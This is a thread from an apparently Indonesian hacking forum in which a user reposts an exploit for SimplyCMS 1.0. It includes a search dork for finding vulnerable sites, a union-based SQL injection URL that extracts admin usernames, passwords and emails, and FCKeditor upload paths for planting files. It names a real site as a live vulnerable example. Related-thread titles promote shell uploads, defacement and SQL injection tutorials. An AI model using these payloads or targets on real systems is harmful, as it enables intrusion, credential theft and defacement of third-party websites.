Threaded Mode | Linear Mode

katob al mubarrak · 05-26-2012, 10:38 PM

tadi ane habis jalan,, ini hasilnya belajar

Code:

SimplyCMS 1.0  Sql Injection/Arbitrary File Upload Vulnerabilties

====================================================================

####################################################################

.:. Author         : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]

.:. Script         : http://www.dsthosting.com/

.:. Drok           : inurl:"index.php?subid=" "Powered by DST - SimplyCMS"

.:. Gr34T$ T0 [aboud-el]

####################################################################

===[ Exploit ]===

Sql Injection

==============

http://SITE/index.php?subid=7[sql]

http://SITE/index.php?subid=7'+and+1=2+union+select+group_concat(ct,0x3a,username,0x3a,adminpass,0x3a,adminemail)+from+adminconf-- -

WEBSITE LOGIN: http://SITE/cms/index.php

Multiple Arbitrary File Upload

===============================

http://SITE/cms/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php << untuk upload file bertipe gambar

http://SITE/cms/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php << untuk upload file bertipe documents

http://SITE/cms/FCKeditor/editor/filemanager/browser/default/connectors/test.html

http://SITE/cms/FCKeditor/editor/filemanager/upload/test.html

http://SITE/cms/FCKeditor/editor/filemanager/browser/default/frmupload.html

Your File:

http://SITE/cms/myFiles/Image/ << untuk melihat isi file gambar

http://SITE/cms/myFiles/File/  << untuk melihat isi file documents

contoh site ada bugsnya :

http://www.mypinnacle.com.sg/cms/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

di atas sudah ane edit-edit semoga aja tidak di marahin sama autors orinya berdoa

***Bunga.Mataharry*** · 05-27-2012, 01:24 AM

Possibly Related Threads...
Thread:		Author	Replies:	Views:	Last Post
	[Tutor] Hunting Windows Server+Upload Shell Via phpmyadmin using Computer Search Engine	tey	17	654	Today 03:07 AM Last Post: sarnobroken
	[Tutor] Local File Inclusion http://www.mojokertokota.go.id/	KotoM	34	1,804	05-12-2013 08:13 PM Last Post: jihad_irhaby
	[Ask] Tentang Sqli nih?	FebriNewbie	10	142	05-10-2013 02:00 PM Last Post: uzumady
	Tools SQLi	itzmeamar	16	282	05-04-2013 07:35 AM Last Post: jundulloh
	[Tutor] mudahnya mencari file sensitif pada website	w0rmil_alazka	18	1,272	04-25-2013 10:57 AM Last Post: kid_1412
	SQLI Hunter v1.1	mpratz	5	169	04-20-2013 10:38 PM Last Post: mpratz
	[Tutor] Upload shell image via tamper data	test	25	841	04-18-2013 04:45 PM Last Post: NvC User
	[Tutor] Deface website with SPAW Upload Vuln	castro	31	2,499	03-25-2013 10:02 AM Last Post: lanionk
	[Tutor] Live [SQLi] + Reset Password Joomla	momodrock	24	534	03-25-2013 09:51 AM Last Post: lanionk
	Post SQLi Disini, sambil Belajar	Kimmonosz	269	13,144	03-19-2013 05:07 PM Last Post: facl3ss